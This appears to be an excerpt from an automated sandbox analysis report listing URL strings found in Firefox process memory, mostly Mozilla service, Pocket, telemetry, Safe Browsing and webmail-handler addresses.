Source: firefox.exe, 00000003.00000003.1505427923.000001CA0EF98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-images/f0f51715-7f5e-48de-839
Source: firefox.exe, 0000000A.00000002.2635536628.00000129187D0000.00000002.10000000.00040000.00000000.sdmpString found in binary or memory: https://firefox-source-docs.mozilla.org/networking/dns/trr-skip-reasons.html#
Source: firefox.exe, 00000003.00000003.1646841035.000001CA1B026000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://firefox.settings.services.mozilla.com
Source: firefox.exe, 00000003.00000003.1640176486.000001CA1B2BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://firefox.settings.services.mozilla.com/
Source: firefox.exe, 00000003.00000003.1667834024.000001CA1B2BF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://firefox.settings.services.mozilla.com/v1/buckets/main/collections/ms-language-packs/records/
Source: firefox.exe, 00000003.00000003.1822023600.000001CA0C08B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://firefox.settings.services.mozilla.com/v1/buckets/monitor/collections/changes/changeset?_expe
Source: firefox.exe, 00000003.00000003.1602997951.000001CA1A9FB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1946644737.000001CA1950A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1704087204.000001CA0F1CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://firefox.settings.services.mozilla.com/v1/buckets/monitor/collections/changes/changeset?colle
Source: firefox.exe, 00000003.00000003.1645054810.000001CA7FE0F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fpn.firefox.com
Source: firefox.exe, 00000003.00000003.1533147530.000001CA1B12F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fpn.firefox.com/
Source: firefox.exe, 0000000A.00000002.2635536628.00000129187D0000.00000002.10000000.00040000.00000000.sdmpString found in binary or memory: https://ftp.mozilla.org/pub/labs/devtools/adb-extension/#OS#/adb-extension-latest-#OS#.xpi
Source: firefox.exe, 00000008.00000002.2641324645.000002712580A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000000A.00000002.2641868178.0000012918A0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.cdn.mozilla.net/
Source: firefox.exe, 00000003.00000003.1650975540.000001CA15BBE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000008.00000002.2641324645.00000271258C7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000000A.00000002.2641868178.0000012918AC4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=$apiKey&locale_lang=
Source: firefox.exe, 00000003.00000003.1799972622.000001CA154BA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1700724596.000001CA154AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1927579070.000001CA154BA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1671012859.000001CA154E0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000008.00000002.2641324645.00000271258C7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000000A.00000002.2641868178.0000012918AC4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.cdn.mozilla.net/v3/firefox/trending-topics?version=2&consumer_key=$apiKey&locale_l
Source: firefox.exe, 0000000A.00000002.2641868178.0000012918A30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.cdn.mozilla.net/v3/newtab/layout?version=1&consumer_key=$apiKey&layout_variant=bas
Source: firefox.exe, 00000003.00000003.2010688164.000001CA0B5D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/explore/career?utm_source=pocket-newtab
Source: firefox.exe, 00000003.00000003.1650975540.000001CA15BBE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/explore/career?utm_source=pocket-newtabL
Source: firefox.exe, 00000003.00000003.2010688164.000001CA0B5D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/explore/entertainment?utm_source=pocket-newtab
Source: firefox.exe, 00000003.00000003.1650975540.000001CA15BBE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/explore/entertainment?utm_source=pocket-newtabC
Source: firefox.exe, 00000003.00000003.1650975540.000001CA15BBE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/explore/food?utm_source=pocket-newtabA
Source: firefox.exe, 00000003.00000003.2010688164.000001CA0B5D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/explore/health?utm_source=pocket-newtab
Source: firefox.exe, 00000003.00000003.1650975540.000001CA15BBE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/explore/health?utm_source=pocket-newtabE
Source: firefox.exe, 00000003.00000003.2010688164.000001CA0B5D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/explore/science?utm_source=pocket-newtab
Source: firefox.exe, 00000003.00000003.1650975540.000001CA15BBE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/explore/science?utm_source=pocket-newtabG
Source: firefox.exe, 00000003.00000003.1650975540.000001CA15BBE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/explore/self-improvement?utm_source=pocket-newtab?
Source: firefox.exe, 00000003.00000003.2010688164.000001CA0B5D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/explore/technology?utm_source=pocket-newtab
Source: firefox.exe, 00000003.00000003.1650975540.000001CA15BBE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/explore/technology?utm_source=pocket-newtabN
Source: firefox.exe, 00000003.00000003.1799972622.000001CA154BA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1700724596.000001CA154AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1927579070.000001CA154BA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000008.00000002.2641324645.00000271258C7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000000A.00000002.2641868178.0000012918AC4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/explore/trending?src=fx_new_tab
Source: firefox.exe, 00000003.00000003.1671012859.000001CA154E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/explore/trending?src=fx_new_tabL
Source: firefox.exe, 00000003.00000003.2010688164.000001CA0B5D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/explore?utm_source=pocket-newtab
Source: firefox.exe, 00000003.00000003.1650975540.000001CA15BBE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/explore?utm_source=pocket-newtabI
Source: firefox.exe, 00000003.00000003.1650975540.000001CA15B9D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/firefox/new_tab_learn_more
Source: firefox.exe, 00000003.00000003.1650975540.000001CA15BBE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/firefox/new_tab_learn_more/
Source: firefox.exe, 00000003.00000003.1799972622.000001CA154BA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1700724596.000001CA154AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1927579070.000001CA154BA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000008.00000002.2641324645.00000271258C7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000000A.00000002.2641868178.0000012918AC4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/recommendations
Source: firefox.exe, 00000003.00000003.1671012859.000001CA154E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/recommendationsS
Source: firefox.exe, 00000003.00000003.1671012859.000001CA154E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/recommendationsS7
Source: firefox.exe, 00000003.00000003.1671012859.000001CA154E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/v3/newtab/layout?version=1&consumer_key=$apiKey&layout_variant=basic
Source: firefox.exe, 00000003.00000003.1479322892.000001CA157AB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/google/closure-compiler/issues/3177
Source: firefox.exe, 00000003.00000003.1484724664.000001CA155CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/lit/lit/blob/main/packages/reactive-element/src/decorators/query-all.ts
Source: firefox.exe, 00000003.00000003.1484724664.000001CA155CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/lit/lit/blob/main/packages/reactive-element/src/decorators/query.ts
Source: firefox.exe, 00000003.00000003.1479097899.000001CA157DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/microsoft/TypeScript/issues/338).
Source: firefox.exe, 00000003.00000003.1442898301.000001CA09321000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1442612663.000001CA09000000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mozilla-services/screenshots
Source: firefox.exe, 00000003.00000003.1672954302.000001CA0F163000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.2027390218.000001CA0CE6F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/uuidjs/uuid#getrandomvalues-not-supported
Source: firefox.exe, 00000003.00000003.1671012859.000001CA154E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/zertosh/loose-envify)
Source: firefox.exe, 00000003.00000003.1770413347.0000331419603000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1529062996.000001CA19CA0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1517049972.000001CA0B399000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1659427689.000001CA19CA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ib.absa.co.za/
Source: firefox.exe, 00000003.00000003.2026626662.000001CA0CE9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://identity.mozilla.com/apps/oldsync
Source: firefox.exe, 00000003.00000003.1616308895.000001CA1B229000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://identity.mozilla.com/apps/oldsyncS
Source: firefox.exe, 00000003.00000003.2026626662.000001CA0CE9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://identity.mozilla.com/apps/oldsyncresource://services-common/logmanager.sys.mjsidentity.fxacc
Source: firefox.exe, 00000003.00000003.2027390218.000001CA0CE7A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.2105394117.000001CA0CE80000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1536872816.000001CA19C5B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://identity.mozilla.com/apps/relay
Source: firefox.exe, 00000003.00000003.2026626662.000001CA0CE9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://identity.mozilla.com/cmd/
Source: firefox.exe, 00000003.00000003.1616308895.000001CA1B229000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://identity.mozilla.com/cmd/H
Source: firefox.exe, 00000003.00000003.1616308895.000001CA1B229000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://identity.mozilla.com/cmd/HCX
Source: firefox.exe, 00000003.00000003.2026626662.000001CA0CE9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://identity.mozilla.com/cmd/resource://gre/modules/FileUtils.sys.mjsidentity.fxaccounts.remote.
Source: firefox.exe, 00000003.00000003.2026626662.000001CA0CE9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://identity.mozilla.com/ids/ecosystem_telemetry
Source: firefox.exe, 00000003.00000003.1616308895.000001CA1B229000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://identity.mozilla.com/ids/ecosystem_telemetryU
Source: firefox.exe, 00000003.00000003.1616308895.000001CA1B229000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://identity.mozilla.com/ids/ecosystem_telemetryUFj
Source: firefox.exe, 00000003.00000003.2026626662.000001CA0CE9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://identity.mozilla.com/ids/ecosystem_telemetrynot
Source: firefox.exe, 00000003.00000003.1650975540.000001CA15BBE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://img-getpocket.cdn.mozilla.net/X
Source: firefox.exe, 00000008.00000002.2641324645.00000271258E7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000000A.00000002.2658026941.0000012918C06000.00000004.00000800.00020000.00000000.sdmp, prefs-1.js.3.drString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4CLXfQbX4pbW4QbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: firefox.exe, 00000003.00000003.2099687811.000001CA0B16B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000000A.00000002.2635536628.00000129187D0000.00000002.10000000.00040000.00000000.sdmpString found in binary or memory: https://incoming.telemetry.mozilla.org
Source: firefox.exe, 00000003.00000003.1676554720.000001CA0EAEC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1809974963.000001CA0EAEC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1932831313.000001CA0EAEF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000008.00000002.2641324645.00000271258CC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000000A.00000002.2641868178.0000012918AF4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://incoming.telemetry.mozilla.org/submit
Source: firefox.exe, 00000003.00000003.1645389070.000001CA1B1DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://incoming.telemetry.mozilla.org/submit/firefox-desktop/events/1/effe9ff1-29cf-4e09-8705-1949b
Source: firefox.exe, 00000003.00000003.1754777749.000001CA0BBA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://incoming.telemetry.mozilla.org/submit/firefox-desktop/messaging-system/1/aabf5a2e-4b35-4c83-
Source: firefox.exe, 00000003.00000003.1802512268.000001CA0F12F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1672954302.000001CA0F12C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://incoming.telemetry.mozilla.org/submit/firefox-desktop/messaging-system/1/cc17ce6f-06b5-463f-
Source: firefox.exe, 00000003.00000003.1613334536.000001CA1B784000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://incoming.telemetry.mozilla.org/submit/firefox-desktop/metrics/1/905a8161-c041-4a92-9baf-1fa8
Source: firefox.exe, 00000003.00000003.1671012859.000001CA154E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://incoming.telemetry.mozilla.org/submits
Source: firefox.exe, 00000003.00000003.1479097899.000001CA157DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://infra.spec.whatwg.org/#ascii-whitespace
Source: firefox.exe, 00000003.00000003.1817863075.000001CA0C9E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://json-schema.org/draft/2019-09/schema
Source: firefox.exe, 00000003.00000003.1676028783.000001CA0EEA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://json-schema.org/draft/2019-09/schema.
Source: firefox.exe, 00000003.00000003.1676028783.000001CA0EEA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://json-schema.org/draft/2019-09/schema./
Source: firefox.exe, 00000003.00000003.1676028783.000001CA0EEA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://json-schema.org/draft/2020-12/schema/
Source: firefox.exe, 00000003.00000003.1676028783.000001CA0EEA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://json-schema.org/draft/2020-12/schema/=
Source: firefox.exe, 00000003.00000003.1478676467.000001CA15B2E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lit.dev/docs/templates/directives/#stylemap
Source: firefox.exe, 00000003.00000003.1480638505.000001CA0B675000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1756467195.000001CA0B684000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.2008557287.000001CA0B684000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://location.services.mozilla.com
Source: firefox.exe, 0000000A.00000002.2635536628.00000129187D0000.00000002.10000000.00040000.00000000.sdmpString found in binary or memory: https://location.services.mozilla.com/v1/country?key=%MOZILLA_API_KEY%
Source: firefox.exe, 00000003.00000003.1943565059.000001CA0C518000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1746171963.000001CA0CFF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://location.services.mozilla.com/v1/country?key=7e40f68c-7938-4c5d-9f95-e61647c213eb
Source: firefox.exe, 00000003.00000003.1671012859.000001CA154DA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1677981793.000001CA0EA4B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com
Source: firefox.exe, 00000003.00000003.2026626662.000001CA0CE9B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1532616474.000001CA1B149000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1646525536.000001CA1B14B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1640490898.000001CA1B14E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1718008060.000001CA1B14B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1517049972.000001CA0B399000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lookerstudio.google.com/embed/reporting/
Source: firefox.exe, 00000003.00000003.1670225801.000001CA1599A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/?extsrc=mailto&url=%s
Source: firefox.exe, 00000003.00000003.1670225801.000001CA1599A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.inbox.lv/compose?to=%s
Source: firefox.exe, 00000003.00000003.1670225801.000001CA1599A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.inbox.lv/compose?to=%sv
Source: firefox.exe, 00000003.00000003.1670225801.000001CA1599A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.yahoo.co.jp/compose/?To=%s
Source: firefox.exe, 00000003.00000003.1670225801.000001CA1599A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.yahoo.co.jp/compose/?To=%st
Source: firefox.exe, 00000003.00000003.1529691013.000001CA199CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mathiasbynens.be/
Source: firefox.exe, 00000003.00000003.1529691013.000001CA199CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mathiasbynens.be/notes/javascript-encoding#surrogate-formulae
Source: firefox.exe, 00000003.00000003.1529691013.000001CA199CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mathiasbynens.be/notes/javascript-escapes#single
Source: firefox.exe, 00000006.00000002.2640388239.000002A67A072000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000008.00000002.2641324645.0000027125881000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000000A.00000002.2641868178.0000012918A8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://merino.services.mozilla.com/api/v1/suggest
Source: firefox.exe, 0000000A.00000002.2635536628.00000129187D0000.00000002.10000000.00040000.00000000.sdmpString found in binary or memory: https://mitmdetection.services.mozilla.com/
Source: firefox.exe, 00000003.00000003.1645054810.000001CA7FE0F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.2102737389.000001CA085A8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.2023659253.000001CA085A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://monitor.firefox.com
Source: firefox.exe, 00000003.00000003.1533147530.000001CA1B12F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://monitor.firefox.com/
Source: firefox.exe, 0000000A.00000002.2635536628.00000129187D0000.00000002.10000000.00040000.00000000.sdmpString found in binary or memory: https://monitor.firefox.com/?entrypoint=protection_report_monitor&utm_source=about-protections
Source: firefox.exe, 0000000A.00000002.2635536628.00000129187D0000.00000002.10000000.00040000.00000000.sdmpString found in binary or memory: https://monitor.firefox.com/user/breach-stats?includeResolved=true
Source: firefox.exe, 00000003.00000003.1571508369.000001CA0AEB6000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1558216014.000001CA0AEB7000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1564754564.000001CA0AEB7000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1522082697.000001CA0AE90000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1547716853.000001CA0AEB8000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1540065033.000001CA0AE9D000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1545926516.000001CA0AEB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mozilla.org0/
Source: firefox.exe, 00000003.00000003.1529691013.000001CA199CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mths.be/jsesc
Source: firefox.exe, 00000003.00000003.2023659253.000001CA08581000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000000A.00000002.2635536628.00000129187D0000.00000002.10000000.00040000.00000000.sdmpString found in binary or memory: https://normandy.cdn.mozilla.net/api/v1
Source: firefox.exe, 00000003.00000003.1805114198.000001CA0C526000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1845487802.000001CA0C08B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1822023600.000001CA0C08B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://normandy.cdn.mozilla.net/api/v1/
Source: firefox.exe, 00000003.00000003.1670225801.000001CA1599A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://outlook.live.com/default.aspx?rru=compose&to=%s
Source: firefox.exe, 0000000A.00000002.2635536628.00000129187D0000.00000002.10000000.00040000.00000000.sdmpString found in binary or memory: https://play.google.com/store/apps/details?id=org.mozilla.firefox.vpn&referrer=utm_source%3Dfirefox-
Source: firefox.exe, 00000003.00000003.1670225801.000001CA1599A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://poczta.interia.pl/mh/?mailto=%s
Source: firefox.exe, 00000003.00000003.1670225801.000001CA1599A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://poczta.interia.pl/mh/?mailto=%sx
Source: firefox.exe, 0000000A.00000002.2635536628.00000129187D0000.00000002.10000000.00040000.00000000.sdmpString found in binary or memory: https://profile.accounts.firefox.com/v1
Source: firefox.exe, 00000003.00000003.1634817342.000001CA7F2F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://profiler.firefox.com/
Source: firefox.exe, 00000003.00000003.1535183184.000001CA1B057000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://push.services.mozilla.com
Source: firefox.exe, 00000003.00000003.1622567161.000001CA1B17A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://push.services.mozilla.com/
Source: firefox.exe, 00000003.00000003.2096905676.000001CA0B1FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://redirector.gvt1.com
Source: firefox.exe, 00000003.00000003.2099687811.000001CA0B16B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://redirector.gvt1.com/
Source: firefox.exe, 00000003.00000003.2022641145.000001CA085AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.2027390218.000001CA0CE6F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://redirector.gvt1.com/edgedl/widevine-cdm/4.10.2557.0-win-x64.zip
Source: firefox.exe, 00000003.00000003.1671012859.000001CA154E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://redux.js.org/api-reference/store#subscribe(listener)
Source: firefox.exe, 00000003.00000003.1672248183.000001CA0F1CB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1825387742.000001CA0F1CB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1704087204.000001CA0F1CB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000000A.00000002.2635536628.00000129187D0000.00000002.10000000.00040000.00000000.sdmpString found in binary or memory: https://relay.firefox.com/accounts/profile/?utm_medium=firefox-desktop&utm_source=modal&utm_campaign
Source: firefox.exe, 00000003.00000003.2105394117.000001CA0CE84000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.2027390218.000001CA0CE7A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000000A.00000002.2635536628.00000129187D0000.00000002.10000000.00040000.00000000.sdmpString found in binary or memory: https://relay.firefox.com/api/v1/
Source: firefox.exe, 0000000A.00000002.2635536628.00000129187D0000.00000002.10000000.00040000.00000000.sdmpString found in binary or memory: https://safebrowsing.google.com/safebrowsing/downloads?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%
Source: firefox.exe, 00000003.00000003.1825387742.000001CA0F1CD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1672248183.000001CA0F1CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://safebrowsing.google.com/safebrowsing/downloads?client=SAFEBROWSING_ID&appver=118.0&pver=2.2&
Source: firefox.exe, 00000003.00000003.1528893203.000001CA19CB6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1647546728.000001CA19CB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://safebrowsing.google.com/safebrowsing/gethash?client=SAFEBROWSING_ID&appver=118.0&pver=2.2
Source: firefox.exe, 00000003.00000003.2094528204.000001CA0B4B3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.2012410803.000001CA0B4B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://safebrowsing.googleapis.com
Source: firefox.exe, 00000003.00000003.2014745861.000001CA0B429000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://safebrowsing.googleapis.com/
Source: firefox.exe, 00000003.00000003.2027247124.000001CA0CE94000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1930166713.000001CA0F1CF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1825387742.000001CA0F1CD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1672248183.000001CA0F1CB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1704087204.000001CA0F1CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://safebrowsing.googleapis.com/v4/fullHashes:find?$ct=application/x-protobuf&key=AIzaSyC7jsptDS
Source: firefox.exe, 0000000A.00000002.2635536628.00000129187D0000.00000002.10000000.00040000.00000000.sdmpString found in binary or memory: https://safebrowsing.googleapis.com/v4/threatListUpdates:fetch?$ct=application/x-protobuf&key=%GOOGL
Source: firefox.exe, 00000003.00000003.1718320536.000001CA1B116000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.2027390218.000001CA0CE6F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://safebrowsing.googleapis.com/v4/threatListUpdates:fetch?$ct=application/x-protobuf&key=AIzaSy
Source: firefox.exe, 0000000A.00000002.2635536628.00000129187D0000.00000002.10000000.00040000.00000000.sdmpString found in binary or memory: https://sb-ssl.google.com/safebrowsing/clientreport/download?key=%GOOGLE_SAFEBROWSING_API_KEY%
Source: firefox.exe, 00000003.00000003.1645054810.000001CA7FE0F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.2102737389.000001CA085A8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.2023659253.000001CA085A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://screenshots.firefox.com
Source: firefox.exe, 00000003.00000003.1533147530.000001CA1B12F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.2017734041.000001CA0B145000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://screenshots.firefox.com/
Source: firefox.exe, 00000003.00000003.1579874813.000001CA1964B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://searchfox.org/mozilla-central/source/toolkit/components/search/SearchUtils.jsm#145-152
Source: firefox.exe, 00000003.00000003.2012410803.000001CA0B4D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/addon
